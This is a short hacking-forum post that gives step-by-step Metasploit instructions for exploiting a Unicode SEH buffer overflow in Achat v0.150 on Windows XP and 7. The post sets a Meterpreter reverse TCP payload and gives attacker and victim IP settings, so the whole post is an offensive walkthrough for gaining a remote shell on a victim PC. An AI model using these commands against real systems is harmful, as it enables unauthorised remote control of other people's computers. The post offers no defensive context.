• We just launched and are currently in beta. Join us as we build and grow the community.

Hack Remote Windows PC using Achat Unicode SEH Buffer Overflow

tinyhf

SERP Explorer
T Rep
0
0
0
Rep
0
T Vouches
0
0
0
Vouches
0
Posts
199
Likes
182
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 300 XP
This module exploits a Unicode SEH buffer overflow in Achat. By sending a crafted message to the default port 9256/UDP, it’s possible to overwrite the SEH handler. Even when the exploit is reliable, it depends on timing since there are two threads overflowing the stack in the same time. This module has been tested on Achat v0.150 running on Windows XP SP3 and Windows 7.

Exploit Targets

Achat v0.150

Requirement

Attacker: kali Linux

Victim PC: Windows XP SP 3

Open Kali terminal type msfconsole

1.png


Now type use exploit/windows/misc/achat_bof

msf exploit (achat_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (achat_bof)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (achat_bof)>set rhost 192.168.1.8 (IP of Remote Host)

msf exploit (achat_bof)>exploit

3.png


2.png
 

436,046

314,222

314,231

Top